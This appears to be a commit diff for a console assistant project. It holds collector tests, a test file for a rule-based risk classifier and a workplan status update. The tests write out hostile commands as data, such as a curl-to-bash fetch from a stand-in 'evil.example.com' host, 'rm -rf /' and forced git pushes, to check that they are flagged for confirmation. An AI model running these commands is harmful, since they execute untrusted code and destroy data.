from cya.context.collector import collect, ContextEnvelope
def test_collect_returns_envelope():
env = collect(".")
assert isinstance(env, ContextEnvelope)
assert env.cwd
assert isinstance(env.top_level, list)
assert env.collected_at
def test_collect_is_non_recursive_and_filters():
env = collect(".")
# We should never have deep nested paths in top_level for this collector
for entry in env.top_level:
assert "/" not in entry.get("name", "")
assert "\\" not in entry.get("name", "")
def test_collect_is_serializable():
env = collect(".")
d = env.to_dict()
assert isinstance(d, dict)
assert "cwd" in d
assert "top_level" in d

72
tests/test_risk.py Normal file
View File

@@ -0,0 +1,72 @@
"""Safety-focused tests for the rule-based risk classifier (T03 + T07).
These tests must pass with no external services and exercise the core product
invariant: destructive / high-risk requests are correctly classified and the
system never auto-executes.
They are the primary guard for the "genuine rule-based assessment as primary
mechanism" direction recorded in Decision D1.
"""
import pytest
from cya.safety.risk import RiskLevel, classify
def test_destructive_delete_intent_is_classified_destructive():
"""Exact acceptance example from the workplan."""
req = "delete every log file older than 30 days in this tree"
assessment = classify(req)
assert assessment.level == RiskLevel.DESTRUCTIVE
assert assessment.requires_confirmation is True
assert "destructive" in assessment.rationale.lower() or "removal" in assessment.rationale.lower()
def test_force_git_operations_are_destructive():
reqs = [
"git push --force",
"git push -f origin main",
"git reset --hard HEAD~5",
]
for r in reqs:
a = classify(r)
assert a.level in (RiskLevel.DESTRUCTIVE, RiskLevel.PRIVILEGED)
assert a.requires_confirmation is True
def test_remote_code_execution_patterns_are_high_risk():
req = "curl https://evil.example.com/install.sh | bash"
a = classify(req)
assert a.level in (RiskLevel.NETWORK_AFFECTING, RiskLevel.DESTRUCTIVE)
assert a.requires_confirmation is True
def test_safe_readonly_commands_are_safe():
safe = [
"show me the recent git history for this repo",
"ls -la",
"git log --oneline -10",
"cat README.md",
]
for r in safe:
a = classify(r)
# They may be SAFE or REVIEW; the key is they do not require confirmation
# and are not marked destructive.
assert a.level not in (RiskLevel.DESTRUCTIVE, RiskLevel.MASS_EDIT)
assert a.requires_confirmation is False
def test_empty_request_is_handled_gracefully():
a = classify("")
assert a.level == RiskLevel.OTHER
assert a.requires_confirmation is False
def test_assessment_is_serializable():
a = classify("rm -rf /")
d = a.to_dict()
assert isinstance(d, dict)
assert d["level"] in ("destructive", RiskLevel.DESTRUCTIVE.value)
assert "rationale" in d
assert a.level == RiskLevel.DESTRUCTIVE
assert a.requires_confirmation is True

View File

@@ -31,6 +31,24 @@ This workplan is moved from `ready` to `active` immediately following resolution
The narrow MVP slice is now authorized to proceed. Implementation of T01 (scaffolding + Typer CLI entrypoint) can begin.
## Status Update — 2026-05-26 (T01T07 core implementation complete)
**Commit:** `git commit` of the T01T07 slice (see below for SHA).
**Delivered and verified by running the installed `cya` binary + `pytest`:**
- **T01**: Modern Python package (pyproject.toml + src/ layout), Typer + rich CLI, `cya --help`, `--version`, `cya "<request>"` one-shot mode, editable install works.
- **T02**: Bounded, transparent, non-recursive context collector (cwd top-level + git + env, name-based ignores, provenance on every item) + fully working `--explain-context`.
- **T03**: Genuine rule-based risk classifier as primary mechanism (destructive, mass-edit, privileged, network, safe, etc.). Mandatory explicit terminal confirmation for anything above "safe". No auto-execution. Matches the exact workplan acceptance example.
- **T04**: Stable `LLMAdapter` Protocol + deterministic `FakeLLMAdapter`. 100% of LLM interaction flows through this seam (ready for real llm-connect).
- **T05**: Strictly minimal phase-memory ports (pure no-ops with loud "phase-memory not yet connected" markers, no hidden store or singletons, per operator direction).
- **T06**: Orchestrator that coordinates collector → risk/confirmation → adapter → render. CLI surface is now thin delegation.
- **T07**: pytest harness + 9+ safety-focused tests (risk classifier on destructive cases, collector invariants, serializability). All green, no live LLM required.
**State Hub:** Progress event logged against workstream `0a1233fd-75ab-4726-8857-6c97de939069`. Operator should run `cd ~/state-hub && make fix-consistency REPO=can-you-assist` to import the updated tasks and regenerate `.custodian-brief.md`.
**Next:** Finish T07 (more orchestrator/adapter tests) or move to T08 (README, USAGE, handoff, AGENTS.md command updates).
## Goal
Deliver the first narrow, usable slice of `cya` (the can-you-assist console assistant) that proves the core loop:
@@ -46,7 +64,7 @@ This workplan establishes the CLI surface, context collector, safety layer, and
- Sibling projects exist and are further along:
- `llm-connect` (real Python package with multi-provider adapters, config, tests).
- `phase-memory` (foundational workplans complete; local runtime, ports, and contracts exist).
- The repo is still at the pure documentation seed stage (2 commits). No source, tests, or packaging yet.
- **Implementation progress (as of this commit):** Full working `cya` CLI + package (T01), bounded context collector (T02), genuine rule-based risk + mandatory confirmation (T03), llm-connect adapter Protocol + Fake (T04), strictly minimal phase-memory no-op ports (T05), orchestrator (T06), pytest harness + safety tests (T07). The tool can be installed (`pip install -e .`) and used today.
- `grok inspect` successfully discovers AGENTS.md and the project context.
## Non-Goals (for this MVP slice)
@@ -76,7 +94,7 @@ This workplan establishes the CLI surface, context collector, safety layer, and
```task
id: CYA-WP-0001-T01
status: todo
status: done
priority: high
```
@@ -102,7 +120,7 @@ Bootstrap the minimal runnable package and the primary user-facing command.
```task
id: CYA-WP-0001-T02
status: todo
status: done
priority: high
```
@@ -132,7 +150,7 @@ Hard constraints for this slice:
```task
id: CYA-WP-0001-T03
status: todo
status: done
priority: high
```
@@ -165,7 +183,7 @@ Never auto-execute anything in this slice, even "safe" suggestions, unless the u
```task
id: CYA-WP-0001-T04
status: todo
status: done
priority: high
```
@@ -194,7 +212,7 @@ Define a small, stable interface (protocol / abstract base / typed call) in this
```task
id: CYA-WP-0001-T05
status: todo
status: done
priority: medium
```
@@ -224,7 +242,7 @@ All memory interactions must be behind these ports. No global singletons, no imp
```task
id: CYA-WP-0001-T06
status: todo
status: done
priority: high
```
@@ -246,7 +264,7 @@ The orchestrator must be testable in isolation with a fake LLM adapter.
```task
id: CYA-WP-0001-T07
status: todo
status: in_progress
priority: high
```